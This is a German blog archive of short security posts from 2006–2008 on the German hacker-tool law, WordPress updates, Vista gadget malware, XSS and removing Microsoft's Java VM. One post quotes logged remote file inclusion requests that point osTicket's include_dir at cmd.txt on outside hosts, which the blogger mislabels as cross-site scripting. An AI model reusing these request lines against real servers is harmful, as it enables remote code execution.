Archive for the 'Sicherheit' Category

Dann war es wohl doch nicht strafbar…

Donnerstag, August 14th, 2008

Wie hier bereits schon mal erwähnt, gab es ja diese Geschichte mit dem Hackerparagraphen und dem Tool-Upload. Der Vollständigkeit halber möchte ich hier festhalten, dass die Geschichte zu Ende ist, weil das Verfahren eingestellt wurde (ohne dabei Grundlegendes zu klären).
Nachzulesen hier im spitblog.
Fiel mir heute wieder ein und sah dazu mal nach.

WordPress 2.3 und Datenschutz

Dienstag, September 25th, 2007

Da freu ich mich (nicht wirklich) über ein neuerlich fälliges Update meiner 20 Blogs und der Nachricht, dass es einen Auto-Updater gibt der das ganze in Zukunft erleichtern soll. Da sieht es so aus, als ob das eine miese Schnüffelnummer ist oder zumindest potentielles Unheil birgt. Update verschoben bis ich mehr Zeit dazu hab.
Der Nachtwächter weiß in seinem Blog mehr dazu.

The InstantUpgrade plugin

Donnerstag, September 13th, 2007

Nur ’ne schnelle Notiz: ein Instantupgrade-Plugin welches WordPress auf Knopfdruck upgraded. Mal mit mehr Zeit ansehen….später.

zirona.com – The InstantUpgrade plugin

„Hackertools“: „Dann werden wir ja definitiv sehen, ob’s strafbar ist oder nicht.“ *Update*

Donnerstag, September 13th, 2007

„BRAVO!“ kann ich da sagen und schmeiss mich weg.

Da hosted jemand einfach ein paar Tools und zeigt sich selber an um zu sehen inwieweit der „Hackerparagraph“ einschlägt oder nicht.

Die ganze Geschichte:

Originalpost auf spitblog.de
gulli.com

Viel Erfolg dabei!
Ich bin gespannt wie es weiter geht.

Update:
Mehr dazu und das Fax: auch auf spitblog.de

Die neue Malware-Generation

Donnerstag, September 13th, 2007

Next generation malware: Windows Vista’s gadget API

Wie Tim Brown auf der Sicherheitsmailingliste Full Disclosure schreibt, sind die neue Generation der Windows-Schädlinge HTML-basierte Widgets.
Dass Windows HTML-Elemente auf Taskbar und Dekstop einbinden kann ist seit NT 4.0 nichts neues, allerdings lief dieser innerhalb einer Art Sandbox im Betriebsystem und konnte hier keinen Schaden anrichten.
Aber seit der neuen Windows Vista API ist es nun möglich und zweifelsohne wird es nicht lange dauern bis das auch die Cracker und bösen Buben entdecken.
Tim verweist auf ein Whitepaper von portcullis-security.com:

Next generation malware: Windows Vista’s gadget API Windows has had the ability to embed HTML into it’s user interface for many years. Right back to and including Windows NT 4.0, it has been possible to embed HTML into the task bar, but the OS has always maintained a sandbox, from which the HTML has been unable to escape. All this changes with Windows Vista.

WordPress 2.2.3 *Update*

Donnerstag, September 13th, 2007

Und wieder eine neue WordPress-Version. Jedes Update ist für mich immer ein kleiner Update-Marathon mit ca. 20 Blogs die auf den aktuellen Stand gebracht werden wollen. *Ächz*
Aber Sicherheit geht vor, also fleißig geupdated. 😉

[Update]

Da hing heise.de aber kräftig hinterher: bis heute hat es gedauert (5 Tage), bis deren Meldung dazu kam. Was war nur los? LAG?

Passwortklau für Dummies

Mittwoch, September 12th, 2007

… oder warum Cross Site Scripting wirklich ein Problem ist.

Ein toller Artikel auf heise.de über Cross-Site-Scripting und böses Javascript.
Lesen und schlauer sein!

Ach du dickes Ei – Websaftsack am Start – Update

Mittwoch, Juli 18th, 2007

Ei ei ei, was haben wir denn hier im 404-Log:

http://kumbula.net/category/include/main.php?config
[search_disp]=true&include_dir=http://br.geocities.com/edmidg/cmd.txt?

War wieder der High-Level-Scripting-L33t-Haxx0r-Bot am Start?

Leck mich!

Update:
Da hat sich wohl jemand ’ne neue Domain besorgt nachdem die bei Geocities gesperrt wurde. *flöt* 😀

404: http://kumbula.net/include/main.php?config
[search_disp]=true&include_dir=http://edl.yoll.net/cmd.txt?

Der Clou an der Sache ist, dass das ein Cross-Site-Scripting-Angriff auf osTicket ist, ein ganz nettes Ticketsystem, was aber schon lange nicht mehr hier läuft. Gut für mich, doof für den schlimmen Finger.

Nahezu kostenlose Firewall von Ashampoo

Donnerstag, August 24th, 2006

Es gibt eine personal Firewall für privaten wie gewerblichen Einsatz lediglich für eine Email-Adresse. Auf heise.de kann man mehr lesen:
http://www.heise.de/newsticker/meldung/77209

Mircrosoft Java Virtual Machine deinstallieren

Sonntag, August 6th, 2006

Die M$-VM ist eine bekannte Sicherheitslücke im System… …daher ist das einer der ersten Schritte wenn ich ein System neu aufsetzte. Hier die Kurzanleitung.

start > ausführen

eingabe :
RunDLL32 advpack.dll, launchINFSection javaINFUnInstall

mit Ja bestätigen un Neustarten

in der registry

hkey_local_machine/software/microsoft/javaVM und
hkey_local_machine/software/microsoft/internet explorer/addvancedoption/java_vm löschen

löschen von :

%systemroot%\java ordner
java.pnf im Ordner %systemroot%\inf
jview.exe und wjview.exe in %systemroot%\system32

Neustart

sun java installieren

http://www.java.com/de/